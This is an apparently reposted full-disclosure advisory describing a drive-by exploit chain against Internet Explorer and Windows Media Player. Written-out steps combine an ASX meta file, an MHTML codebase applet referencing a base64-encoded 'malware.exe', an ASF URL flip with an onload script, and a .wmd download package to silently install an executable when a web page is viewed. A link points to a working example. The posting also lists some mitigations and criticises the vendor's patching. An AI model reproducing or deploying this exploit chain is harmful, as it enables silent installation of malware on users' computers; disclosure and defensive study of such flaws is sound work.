'silent delivery and installation of an executable on the target
computer, no client input other than viewing a web page' default
installation of Internet Explorer and Windows Media Player.
This is truly terrible. In addition to server side '404 errors',
cookies and who knows what else [perhaps user.dat, index.dat, even
the old inbox.mbx], the Windows Media Player appears to be severely
affected by Jelmer codebase too.
Combing the Jelmer codebase, the Sandblad dot bug and the 1 year old
wimpy'flication of the media player [see:
http://www.malware.com/wimpy.html]
1. Create an *.asx meta file as follows:
<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64
TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA
<applet CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\My Documents\My Music\Virtual
Albums\malware\f ck.asx!file:///malware.exe">
2. Create an *.asf file with URL flip as follows:
url: cluster.html
<body onload=malware()>
<script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
}
</script>
3. Create a *.wmd file comprising 1 and 2 above.
What happens?
Ordinarily the Windows Media Download Package file [*.wmd] creates a
folder with the given name of the *.wmd file -- e.g. malware.wmd will
create a folder called malware in the default location for so-
called "Virtual Music" -- specifically: My Documents\My Music\Virtual
Albums\malware, security measures currently incorporated in the
extraction of the contents of the *.wmd do a reasonably good job of
ensuring that files contained within the Download Package, are in
fact valid files.
A reasonably good job.
We find that the bare minimum for the *.asx meta file must include
the
following:
<ASX><Entry><ref HREF=''/></ASX>
with these tags the Media Player will indeed extract the *.asx file
into our
known folder.
So how do we make use of that?
Simple: 1,2,3 above, buckle your shoe.
Working Example:
[hard coded for win98, trivial tweaking for others - harmless *.exe]
http://www.malware.com/malware.php
Important Notes:
1. Suggestions have been made that in this particular instance, the
dot bug is not necessary.
2. Suggestions have been made that the 'open' "object" hole of
http://online.securityfocus.com/bid/5196 will work just as well
3. Disable Active Scripting
4. Disable Media Download [if you can]
5. Change the default location of "My Music..."
5. Hopefully this will all be a bad memory once all the patches.
packs, whatever are finally released.
6. Forget about the 'glitzy' advertising. Think long and hard about
the products you install
Pathetic Notes:
A.
1. The codebase 'vulnerability' is over 2 years old. Demonstrated in
a different form and mentioned in its current form in June 2000
2. Resurrected in fine fashion at the end of 2001 by the Pull with
many others demonstrating similar thereafter
3. Added to in splendid fashion by Jelmer in July 2002 with key
protocol
B. The dot bug by Sandblad of May 2002, patched, not patched, fully
functional to date. With patch and without patch. Not even actually
required in this instance.
C. The malware *.asx meta file and packable transportable *.wmd of
June 2001.
Helpful Notes:
Instead of sitting around trying to thinking up ways that all these
things cannot work, simply fix it the first time round. There is no
such thing as 'mitigating factors' and 'hurdles'. This is a lie. Pure
fantasy. Fiction. Fix it when you can ! For every way you think it
cannot be done, there are 10 ways it actually can !
This concludes our summer session and as we are entering junior high
for the first time in a couple weeks, we need to tinker with our
bicycles while there is still sunlight.
Trust that clarifies matters for you.
Your friend and mine
http://www.malware.com [MVP - malware]
This posting is provided "AS IS" with no warranties, and confers no
rights.
Over and Out
Windows Media Player flaw
Reply With Quote